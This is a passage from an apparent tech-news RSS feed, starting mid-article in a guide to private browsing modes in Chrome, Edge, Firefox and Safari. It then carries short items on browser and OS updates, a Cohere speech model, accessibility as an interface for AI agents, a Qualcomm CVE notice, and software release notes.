<p>The easiest way to open an Incognito window is with the keyboard shortcut combination <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS).</p>



<p>Another way is to click on the menu on the upper right — it’s the three vertical dots — and select <strong>New Incognito Window</strong> from the list.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Open a new Incognito window in Chrome using keyboard shortcuts or from the menu by choosing “New Incognito window.”</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>The new Incognito window can be recognized by the dark background and the stylized “spy” icon just to the left of the three-dots menu. Chrome also reminds users of just what Incognito does and doesn’t do each time a new window is opened. The message may get tiresome for regular Incognito users, but it may also save a job or reputation; it’s important that users remember Incognito doesn’t prevent ISPs, businesses, schools and organizations from knowing where customers, workers, students, and others went on the web or what they searched for.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="699" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Each time a new Incognito window is opened, Chrome reminds users what Incognito doesn’t save. The browser also puts a toggle on the screen for blocking third-party cookies.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Incognito’s introductory screen also displays a toggle — it’s on by default — along with text that states third-party cookies will be blocked while in the privacy mode. Although cookies are never saved locally as long as the user stays in Incognito, websites have been able to track user movements from site to site <i>while within Incognito</i>. Such tracking might be used, for example, to display ads to a user visiting multiple sites in Incognito. This third-party cookie blocking, which halts such behavior, debuted in May 2020.</p>



<p>Google has been experimenting with new language on Chrome’s Incognito introductory page, but it’s yet to make it to the desktop browser. In the Canary build of Chrome on Android, however, the intro now outlines “What Incognito does” and “What Incognito doesn’t do,” to make the mode’s capabilities somewhat clearer to the user. (Some have speculated that the changes were made in reaction to a still-ongoing class-action lawsuit file in 2020 that alleged Google continued to track users’ online behavior and movements in Incognito.)</p>



<p>Once a tab in Incognito has been filled with a website, Chrome continues to remind users that they’re in Incognito by the dark background of the address bar and window title.</p>



<p>A link on an existing page can be opened directly into Incognito by right-clicking the link, then choosing <strong>Open Link in Incognito Window</strong> from the resulting menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>What Incognito looks like after pulling up a website. Note the “spy” icon at the right of the address bar.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p><strong>Pro tip</strong><em><strong>:</strong> To close an Incognito window, shutter it like any other Chrome window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</em></p>



<h2 class="wp-block-heading">How to privately browse with Microsoft Edge</h2>



<p>Microsoft borrowed the name of its private browsing mode, InPrivate, from Internet Explorer (IE), the finally-being-retired legacy browser. InPrivate appeared in IE in March 2009, about three months after Chrome’s Incognito and three months before Firefox’s privacy mode. When Edge was first released in 2015 and then relaunched as a clone of Chrome in January 2020, InPrivate was part of the package, too.</p>



<p>At the keyboard, the combination of <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS) opens an InPrivate window.</p>



<p>A slower way to get there is to click on the menu at the upper right — it’s three dots arranged horizontally — and choose <strong>New InPrivate Window</strong> from the menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="874" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Like other browsers, Edge will take you incognito from the menu when you pick New InPrivate window.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>Edge does a more thorough job of explaining what its private browsing mode does and doesn’t do than any of its rivals, with on-screen paragraphs dedicated to describing what data the browser collects in InPrivate and how the strictest additional anti-tracking setting can be called on from within the mode. In addition, Edge uses the more informal “What Incognito does” and “What Incognito doesn’t do” language on its InPrivate introductory screen.</p>



<p>Microsoft’s browser also well marks InPrivate when the mode is operating: an oval marked “In Private” to the right of the address bar combines with a full-black screen to make sure users know where they’re at.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="843" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Edge offers a detailed explanation of what its private browsing mode does and doesn’t do.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>It’s also possible to launch an InPrivate session by right-clicking a link within Edge and selecting <strong>Open in InPrivate Window</strong>. That option is grayed out when already in a private browsing session but using <strong>Open Link in New Tab</strong> does just that within the current InPrivate frame.</p>



<p>To end InPrivate browsing, simply shut the window by clicking the X in the upper right corner (Windows) or click the red dot at the upper left (macOS).</p>



<p>Although Edge is based on Chromium, the same open-source project that comes up with the code to power Chrome, the Redmond, WA company integrated anti-tracking into its browser. Dubbed “Tracking Prevention,” it works both in Edge’s standard and InPrivate modes.</p>



<p>To set Tracking Prevention, choose <strong>Settings</strong> from the three-ellipses menu at the right, then at the next page, pick <strong>Privacy, Search and Services</strong>. Choose one of the three options — <strong>Basic, Balanced</strong> or <strong>Strict</strong> — and make sure the toggle for <strong>Tracking prevention</strong> is in the “on” position. If you want InPrivate to always default to the harshest anti-tracking — not a bad idea — toggle <strong>Always use “Strict” tracking prevention when browsing InPrivate</strong> to “on.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="708" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Toggle Always use Strict to the ‘on’ position and InPrivate will apply the most stringent anti-tracking even though Edge’s standard mode is set to, say, Balanced.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p><strong>Pro tip:</strong> <i>To open Edge with InPrivate — rather than first opening Edge in standard mode, then launching InPrivate — right-click the Edge icon in the Windows taskbar and select <strong>New InPrivate Window</strong> from the list. There is no similar one-step way to do this in macOS.</i></p>



<h2 class="wp-block-heading">How to privately browse with Mozilla Firefox</h2>



<p>After Chrome trumpeted Incognito, browsers without something similar hustled to catch up. Mozilla added its take — dubbed Private Browsing — about six months after Google, in June 2009.</p>



<p>From the keyboard, a private browsing session can be called up using the combination <strong>Ctrl-Shift-P</strong> (Windows) or <strong>Command-Shift-P</strong> (macOS).</p>



<p>Alternately, a private window will open from the menu at the upper right of Firefox — three short horizontal lines — after selecting <strong>New private window</strong>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="889" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Opening a private browsing window is as simple as choosing New Private Window from the Firefox menu.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A private session window is marked by the purple “mask” icon in the title bar of the Firefox frame. In Windows, the icon is to the left of the minimize/maximize/close buttons; on a Mac, the mask squats at the far right of the title bar. Unlike Chrome and Edge, Firefox does not color-code the top components of the browser window to signify the user is in privacy mode.</p>



<p>Like other browsers, Firefox warns users that private browsing is no cure-all for privacy ills but is limited in what it blocks from being saved during a session. “Private window: Firefox clears your search and browsing history when you close all private windows. This doesn’t make you anonymous,” the caution reads.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="654" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Firefox reminds users that while a private session doesn’t save searches or browsing histories, it doesn’t cloak them in complete anonymity. The page also links to more detailed information.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A link can be opened into a Firefox Private Window by right-clicking the link, then choosing <strong>Open Link in New Private Window</strong> from the menu.</p>



<p>To close a Private Window, shut it down just as one would any Firefox window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</p>



<p>Notable is that Firefox’s private browsing mode is accompanied by the browser’s superb “Enhanced Tracking Protection,” a suite of tracker blocking tools that stymie all sorts of ad-and-site methods for identifying users, then watching and recording their online behavior. While the earliest version of this was offered only inside Private Windows, the expanded technologies also work within standard mode.</p>



<p>Because Enhanced Tracking Protection is enabled by default within Firefox, it doesn’t matter which of its settings — <strong>Standard, Strict</strong> or <strong>Custom</strong> — is selected as far as private browsing goes; everything that can be blocked will be blocked.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The shield appears in the address bar to note what trackers were blocked by Firefox in a Private Window. Clicking on the icon brings up an accounting of what was barred.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p><strong>Pro tip:</strong> <i>Private Browsing sessions take place over the more secure HTTPS, not the once-standard HTTP protocol. Users don’t need to do anything: The new HTTPS-only policy is on by default. (If the destination site doesn’t support HTTPS, Firefox will go into fallback mode, connecting via HTTP instead.)</i></p>



<h2 class="wp-block-heading">How to browse privately with Apple’s Safari</h2>



<p>Chrome may get far more attention for its Incognito than any other browser — no surprise, since it’s by far the most popular browser on the planet — but Apple’s Safari was actually the first to introduce private browsing. The term <i>private browsing</i> was first bandied in 2005 to describe early Safari features that limited what was saved by the browser.</p>



<p>Side note: Early in private browsing, the label <i>porn mode</i> was often used as a synonym to describe what many writers and reporters assumed was the primary application of the feature. The term has fallen out of favor.</p>



<p>To open what Safari calls a Private Window on a Mac, users can do a three-key combination of <strong>Command-Shift-N</strong>, the same shortcut Chrome adopted. Otherwise, a window can be called up by selecting the <strong>File</strong> menu and clicking on New Private Window.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="803" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>From the File menu in Safari, selecting New Private Window gets you started.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Safari tags each Private Window by darkening the address bar. It also issues a reminder of what it does — or more accurately — what it doesn’t do. “Safari will keep your browsing history private for all tabs of this window. After you close this window, Safari won’t remember the pages you visited, your search history or your AutoFill information,” the top-of-the-page note reads. The warning is more terse than those of other browsers and omits cautions about still-visible online activity.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="321" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The darkened address bar at the top — and the Private button in the left window corner — signal that this Safari window is for private browsing.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Like Firefox, Safari automatically engages additional privacy technologies, whether the user browses in standard or private mode. Safari’s Intelligent Tracking Protection (ITP), which has been around for nearly a decade and repeatedly upgraded, now blocks all third-party cookies, among other components advertisers and services use to track people as they bounce from one site to another. ITP is controlled by a single on-off switch — on is the default — found in <strong>Preferences</strong> under the <strong>Privacy</strong> icon. If the <strong>Website tracking:</strong> box is checked to mark <strong>Prevent cross-site tracking</strong>, ITP is on.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="453" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Switching on cross-site tracking enables Safari’s Intelligent Tracking Protection, which blocks a wide variety of bits advertisers try to use to follow you around the web while you’re using a Private Window.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>A link can be opened directly to a Private Window by right-clicking, then selecting <strong>Open Link in New Private Window</strong>. Close a Private Window just as any Safari window, by clicking the red dot in the upper left corner of the browser frame.</p>



<p><strong>Pro tip:</strong> <i>Once in a Safari Private Window, opening a new tab — either by clicking the + icon at the upper right or by using the Command-T key combo — omits the Private Browsing Enabled notice. (The darkened address bar remains as the sole indicator of a private browsing session.) Other browsers, such as Firefox, repeat their cautionary messages each time a tab is opened in an incognito session.</i></p>



<p><strong>Related reading:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/1717405/googles-chromium-browser-explained.html">Chromium explained: How the open-source engine drives today’s browsers</a></li>



<li><a href="https://www.computerworld.com/article/4083528/ai-web-browsers-are-cool-helpful-and-utterly-untrustworthy.html">AI web browsers are cool, helpful, and utterly untrustworthy</a></li>



<li><a href="https://www.computerworld.com/article/3996011/ai-windows-web-browser.html">How AI will transform your Windows web browser</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[ The Stable channel has been updated to 150.0.7871.100/.101 for Windows and Mac and 150.0.7871.100 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogInterested in switching release channels? Find out how here. If you find a new ...]]></description>
<link>https://tsecurity.de/de/3652484/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652484/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Tue, 07 Jul 2026 20:22:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> <span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 150.0.7871.100/.101 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.100 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.47..150.0.7871.101?pretty=fuller&amp;n=10000">Log</a></span></p><p><br></p><div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cohere Transcribe Arabic is an open-source model built for Arabic's toughest transcription problems]]></title>
<description><![CDATA[Cohere has released Transcribe Arabic, an open-source model for Arabic speech recognition that the company says outperforms Whisper and OmniASR on dialects, code-switching, and bilingual Arabic-English speech. The 2-billion-parameter model is available on Hugging Face under the Apache 2.0 license...]]></description>
<link>https://tsecurity.de/de/3652426/ai-nachrichten/cohere-transcribe-arabic-is-an-open-source-model-built-for-arabics-toughest-transcription-problems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652426/ai-nachrichten/cohere-transcribe-arabic-is-an-open-source-model-built-for-arabics-toughest-transcription-problems/</guid>
<pubDate>Tue, 07 Jul 2026 20:04:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="2000" height="778" src="https://the-decoder.com/wp-content/uploads/2024/06/cohere_logo.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Cohere has released Transcribe Arabic, an open-source model for Arabic speech recognition that the company says outperforms Whisper and OmniASR on dialects, code-switching, and bilingual Arabic-English speech. The 2-billion-parameter model is available on Hugging Face under the Apache 2.0 license.</p>
<p>The article <a href="https://the-decoder.com/cohere-transcribe-arabic-is-an-open-source-model-built-for-arabics-toughest-transcription-problems/">Cohere Transcribe Arabic is an open-source model built for Arabic's toughest transcription problems</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility is the first-class interface for AI agents]]></title>
<description><![CDATA[When I started evaluating browser agents, most of the conversation around me focused on multimodal models, computer-use systems and screenshot-based automation. Almost every framework I evaluated assumed agents needed to perceive the web the way humans do, visually, pixel by pixel.The more time I...]]></description>
<link>https://tsecurity.de/de/3650967/ai-nachrichten/accessibility-is-the-first-class-interface-for-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650967/ai-nachrichten/accessibility-is-the-first-class-interface-for-ai-agents/</guid>
<pubDate>Tue, 07 Jul 2026 11:04:21 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>When I started evaluating browser agents, most of the conversation around me focused on multimodal models, computer-use systems and screenshot-based automation. Almost every framework I evaluated assumed agents needed to perceive the web the way humans do, visually, pixel by pixel.<br><br>The more time I spent shipping agents against real web applications, the more I became convinced we were solving the wrong problem. AI agents would stall on checkout forms because a button had no ARIA role. They would waste seconds and thousands of tokens taking screenshots to figure out what was on the screen.</p>



<p>The problem was never the Agent. It was that we kept treating the web as a visual surface, even though it already has a machine-readable interface. We have had one for decades. It is called the accessibility tree.</p>



<h2 class="wp-block-heading"><a></a>The web already has a machine interface</h2>



<p>Most developers think of accessibility as a feature for people. Technically,<a href="https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA"> accessibility required the web platform to solve a deeper problem</a>: Exposing interfaces in a machine-readable form. Long before AI agents existed, screen readers were already consuming the web through a structured semantic representation of roles, labels, states and relationships. There was no pixel interpretation and no screenshot.</p>



<p>That’s not adjacent to what AI agents need. That <em>is</em> what AI agents need. Long before LLMs existed, assistive technologies proved the core thesis: Machines can navigate interfaces, semantics can outlive presentation and structure can substitute for vision. Screenshot-based agents spend tokens rediscovering facts the browser already knows. The accessibility tree already contains role, name and state in structured form. In my own agent work, switching from screenshot-based to DOM-native execution cut per-action latency from 2–5 seconds to under 500ms and token cost by an order of magnitude.</p>



<h2 class="wp-block-heading">Accessibility proved the thesis. Now we need the next layer</h2>



<p>The most clarifying realization I had was this: Accessibility had already solved a large portion of the problem agents face. Accessibility gives machines a way to <em>discover</em> interfaces. It exposes available controls, their names, their states and their relationships. But discovery is not execution. The accessibility tree can identify a button named “Checkout” and indicate whether it is disabled. What it cannot provide is a contract for the action itself. For example, what inputs it accepts, what preconditions are required and what state changes it produces.</p>



<p>One emerging response to this gap is <a href="https://webmachinelearning.github.io/webmcp/">WebMCP</a>, which introduces a browser-native way to expose typed capabilities that agents can invoke directly. When a form field has no explicit agent annotation, Chrome’s declarative API derives the parameter description from the associated <label> element first. It falls back to aria-description if no label exists. The same HTML that accessibility has required developers to write correctly for thirty years is now the primary input to your agent tool contract. A colleague put it well: “If we had done a good job with accessibility, we should get this for free.”</label></p>



<h2 class="wp-block-heading"><a></a>The frontend patterns that break both</h2>



<p>Modern component architectures actively degrade the semantic quality that accessibility and agents both depend on. When a design system wraps a native button in a custom component, what reaches the DOM is often a div with generated class names and no semantic role. The accessibility tree gets “generic” instead of “button.” Under WebMCP’s declarative API, a form field with no label has no parameter description for the browser to inherit. Either way, the agent has nothing to work with.</p>



<p>Beyond div soup, <a href="https://tanstack.com/virtual/latest"> virtualized lists</a> only render visible rows, making out-of-viewport content completely unreachable. Client state that updates visually but never updates ARIA attributes leaves agents acting on stale snapshots. The common thread is that accessibility was treated as a concern for human users only, and the semantic layer got quietly destroyed in the abstraction. That’s now a double failure.</p>



<h2 class="wp-block-heading"><a></a>Designing for determinism</h2>



<p>Humans can tolerate ambiguous UI. Agents cannot. Every point of ambiguity is a probability distribution over possible actions, and probability distributions can produce wrong actions at scale.<strong></strong></p>



<p>For frontend teams thinking about this now, there are three places to start.</p>



<ol class="wp-block-list">
<li><strong>Make state visible.</strong> Every piece of client state that affects whether an action is available should be reflected in the accessibility tree, not just rendered visually. If your cart count updates in a state store but the button’s aria-label doesn’t update with it, an agent is operating on stale information. ARIA synchronization isn’t an enhancement; it’s part of the interface contract.</li>



<li><strong>Make identifiers stable.</strong> CSS modules and build-time hashing produce class names that change on every deploy and are meaningless as selectors. A data attribute convention with stable, human-readable identifiers—such as checkout.submit_order gives agent runtimes something to target that survives refactors, redesigns and framework migrations. I have added a lint rule that fails the build when interactive elements are missing one.</li>



<li><strong>Make actions explicit.</strong> Today, what an element does lives entirely in JavaScript, opaque to any outside observer. The direction WebMCP points toward, and what I would encourage teams to start thinking about now, is exposing action intent alongside UI semantics: What an action is called, what inputs it accepts, what preconditions it requires and what effects it produces. Even without a formal protocol, a consistent schema gives agent runtimes something to reason about rather than infer.</li>
</ol>



<p>I have started thinking of agent operability as a strict superset of accessibility. Tools like <a href="https://github.com/dequelabs/axe-core">axe-core</a> already catch a meaningful share of agent failures because they validate the semantic layer agents depend on. The WebMCP team’s proposed Lighthouse audit for the agentic web is the natural next layer.<strong></strong></p>



<h2 class="wp-block-heading"><a></a>The completion of work already started</h2>



<p>HTML gave us a machine-readable structure. ARIA and the Accessibility Object Model gave us machine-readable meaning. What agents need next is machine-readable capability: Not just what a control <em>is</em>, but what it <em>does</em>, under what conditions and with what effect.</p>



<p>Teams that invested in accessibility did not just build more inclusive products. They also built the closest thing to agent-compatible UIs on the web. WebMCP makes that inheritance explicit: Labels become parameter descriptions, ARIA metadata becomes agent metadata and semantic structure becomes the foundation for machine execution.</p>



<p>Assistive technologies proved the thesis decades ago: Machines can navigate interfaces, semantics can outlive presentation and structure can substitute for vision. This isn’t a new protocol. It is the completion of work that ARIA and the Accessibility Object Model started – turning machine-readable descriptions into contracts that agents can execute against reliably.</p>



<p>.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.infoworld.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[The ChromeOS Stable channel is being updated to OS version 16667.61.0 (Browser version 149.0.7827.232) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS B...]]></description>
<link>https://tsecurity.de/de/3650057/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650057/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Tue, 07 Jul 2026 00:53:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span color="rgba(0, 0, 0, 0.87)">The ChromeOS Stable channel is being updated to OS version </span><span color="rgba(0, 0, 0, 0.87)">16667.61.0</span><span color="rgba(0, 0, 0, 0.87)"> (Browser version </span><span color="rgba(0, 0, 0, 0.87)">149.0.7827.232</span><span color="rgba(0, 0, 0, 0.87)">) for most ChromeOS devices.</span></p><div><span><span>If you find new issues, please let us know one of the following ways:</span></span></div><ol><li><span><span><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></span></span></li><li aria-level="1"><p role="presentation"><span><span>Visit our ChromeOS communities</span></span></p></li><ol><li aria-level="2"><p role="presentation"><span><span>General: </span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span>Chromebook Help Community</span></a></span></p></li><li aria-level="2"><p role="presentation"><span><span>Beta Specific: </span><a href="https://support.google.com/chromeos-beta/community"><span>ChromeOS Beta Help Community</span></a></span></p></li></ol><li aria-level="1"><p role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span><span><span>Report an issue or send feedback on Chrome</span></span></span></a></p></li><li aria-level="1"><p role="presentation"><span><span>Interested in switching channels? </span><a href="https://support.google.com/chromebook/answer/1086915"><span>Find out how.</span></a></span></p></li></ol><p><span><span><span>Luis Menezes</span></span></span></p><p><span>Google ChromeOS</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25268 | Qualcomm Snapdragon Channel Switching memory corruption]]></title>
<description><![CDATA[A vulnerability, which was classified as very critical, has been found in Qualcomm Snapdragon. This impacts an unknown function of the component Channel Switching Handler. The manipulation leads to memory corruption.

This vulnerability is uniquely identified as CVE-2026-25268. The attack is poss...]]></description>
<link>https://tsecurity.de/de/3649896/sicherheitsluecken/cve-2026-25268-qualcomm-snapdragon-channel-switching-memory-corruption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649896/sicherheitsluecken/cve-2026-25268-qualcomm-snapdragon-channel-switching-memory-corruption/</guid>
<pubDate>Mon, 06 Jul 2026 23:22:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">very critical</a>, has been found in <a href="https://vuldb.com/product/qualcomm:snapdragon">Qualcomm Snapdragon</a>. This impacts an unknown function of the component <em>Channel Switching Handler</em>. The manipulation leads to memory corruption.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-25268">CVE-2026-25268</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[tvOS 26.4 Developer Beta 4 Released: Everything New for Apple TV]]></title>
<description><![CDATA[Apple has released tvOS 26.4 Developer Beta 4 for developers. The update is now available for eligible Apple TV models, mainly for testing apps, checking performance, and finding bugs before the public release.



How to Update to tvOS 26.4 Developer Beta 4




Open Settings on your Apple TV.



...]]></description>
<link>https://tsecurity.de/de/3649712/ios-mac-os/tvos-264-developer-beta-4-released-everything-new-for-apple-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649712/ios-mac-os/tvos-264-developer-beta-4-released-everything-new-for-apple-tv/</guid>
<pubDate>Mon, 06 Jul 2026 21:22:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released tvOS 26.4 Developer Beta 4 for developers. The update is now available for eligible Apple TV models, mainly for testing apps, checking performance, and finding bugs before the public release.



How to Update to tvOS 26.4 Developer Beta 4




Open Settings on your Apple TV.



Go to System.



Select Software Updates.



Turn on Beta Updates.



Choose tvOS 26.4 Developer Beta.



Select Update Software and install the latest beta.




Make sure your Apple TV is connected to a stable Wi-Fi network before starting the update.



All Changes in tvOS 26.4 Developer Beta 4




iTunes Movies and TV Shows apps removed: Apple is removing the old iTunes Movies and iTunes TV Shows apps from Apple TV. Purchased content is now handled through the Apple TV app.



Continuous Audio Connection: tvOS 26.4 adds a new HDMI audio option that helps keep audio connection stable with some sound systems and receivers.



Audio playback fix: The update fixes an issue where audio playback could behave incorrectly when switching between different sound formats, such as Dolby Atmos and stereo.



Performance and stability improvements: Apple has also included general bug fixes and improvements to make Apple TV run smoother during testing.




Since this is still a developer beta, it may include bugs or performance issues. It is better to install it only if you are testing apps or comfortable using beta software.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.17.14]]></title>
<description><![CDATA[Core
Improvements

Added a code mode MCP adapter for running confined orchestration scripts against connected MCP tools.
Hid the execute tool unless code mode is enabled.

Bugfixes

Fixed paginated MCP tool catalogs losing tool metadata and output schema validation.
Preserved low reasoning effort...]]></description>
<link>https://tsecurity.de/de/3649660/downloads/v11714/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649660/downloads/v11714/</guid>
<pubDate>Mon, 06 Jul 2026 21:02:01 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Core</h2>
<h3>Improvements</h3>
<ul>
<li>Added a code mode MCP adapter for running confined orchestration scripts against connected MCP tools.</li>
<li>Hid the <code>execute</code> tool unless code mode is enabled.</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Fixed paginated MCP tool catalogs losing tool metadata and output schema validation.</li>
<li>Preserved low reasoning effort for OpenRouter small-model variants instead of disabling it.</li>
<li>Fixed GitHub Copilot model routing to honor each model's advertised chat or responses endpoint.</li>
<li>Fixed session lists to match equivalent instance directories reliably.</li>
<li>Fixed Cerebras reasoning replay so earlier assistant reasoning is sent back in the provider-supported field.</li>
</ul>
<h2>TUI</h2>
<h3>Bugfixes</h3>
<ul>
<li>Fixed spinner registration so loading indicators keep rendering across TUI surfaces.</li>
</ul>
<h2>Desktop</h2>
<h3>Improvements</h3>
<ul>
<li>Show draft server status in the title bar.</li>
<li>Unified the provider connect flow across the app.</li>
<li>Improved the integrated terminal experience. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Added reopening for closed tabs and background tab opening. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/usrnk1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/usrnk1">@usrnk1</a>)</li>
<li>Improved model search in picker dialogs. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Added recently closed projects to Home. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/usrnk1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/usrnk1">@usrnk1</a>)</li>
<li>Made tab navigation respond on mouse down in the new layout.</li>
